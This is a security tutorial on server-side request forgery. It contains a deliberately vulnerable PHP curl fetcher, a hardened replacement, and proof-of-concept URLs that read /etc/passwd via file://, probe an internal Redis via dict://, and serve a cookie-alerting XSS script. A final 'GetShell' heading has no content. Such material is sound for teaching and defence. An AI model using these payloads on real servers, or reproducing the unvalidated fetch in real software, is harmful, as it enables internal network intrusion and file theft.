SSRF
Vulnerability introduction
SSRF (Server-Side Request Forgery) is a vulnerability that lets an attacker make the server issue network requests, which can be used to attack services on the internal network.
Exploiting SSRF can achieve the following:
1. Scan the internal network (host information gathering, web application fingerprinting)
2. Send crafted payloads to attack the applications identified
3. Denial of service, etc.


Supported protocols:
file:///
dict://
sftp://
ldap://
tftp://
gopher://
Vulnerability impact
DemoCode
<?php
// Vulnerable demo: the URL is taken straight from the request and fetched without any validation
$url = $_GET['url'];
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);              // any scheme curl supports (file://, dict://, gopher://, ...) is accepted
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);  // TLS certificate verification disabled
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);   // redirects are followed, so a public URL can bounce to an internal one
$response = curl_exec($curl);
curl_close($curl);
print_r($response);                                 // the full response body is echoed back to the requester
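A hardened replacement for the demo's fetch, as an added example (not part of the original note): it allowlists http/https, resolves the host itself and rejects private, loopback, link-local and reserved addresses, disables redirects, and pins the validated address with CURLOPT_RESOLVE so a changing DNS answer cannot re-target the request. The function name safe_fetch is assumed, as is the policy that only public HTTP(S) targets are legitimate.

```php
<?php
// Added example, not from the original note. Returns the body on success or false
// when the URL is rejected by policy or the request fails.
function safe_fetch(string $url)
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // 1. Scheme allowlist: blocks file://, dict://, gopher://, ldap://, etc.
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return false;
    }
    $host = $parts['host'];
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);

    // 2. Resolve the name ourselves (IPv4 only via gethostbynamel; IPv6-only hosts
    //    are refused) and reject every address that is private, loopback,
    //    link-local or reserved (127.0.0.1, 192.168.x.x, 169.254.169.254, ...).
    $ips = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : (gethostbynamel($host) ?: []);
    if ($ips === []) {
        return false;
    }
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return false;
        }
    }

    $curl = curl_init();
    curl_setopt_array($curl, [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYPEER => true,   // the demo switched this off
        CURLOPT_FOLLOWLOCATION => false,  // a redirect could point at an internal host
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // 3. Pin the connection to the address we just validated so a DNS answer
        //    that differs between our check and curl's own lookup (rebinding)
        //    cannot steer the request inside the network.
        CURLOPT_RESOLVE        => ["{$host}:{$port}:{$ips[0]}"],
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
    ]);
    $response = curl_exec($curl);
    curl_close($curl);
    return $response;
}
```

With this in place every POC URL below (file://, dict://, and the redirect or internal http:// targets) is refused before curl is ever invoked.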
Local arbitrary file read (Arbitrary File Read)

POC:https://www.*.*/ssrf.php?url=file:///etc/passwd
Internal network service probing (Disclosure of Information)
Redis is used here as the probing example
POC:https://www.*.*/ssrf.php?url=dict://192...*:6379/info

Cross-site scripting (Cross Site Scripting)
POC:https://www.*.*/ssrf.php?url=http://172.18.55.171/xss.php
This is not limited to XSS; XSS is just the example used. The local xss.php is as follows:
<?php
print_r("<script>alert(document.cookie)</script>");
GetShell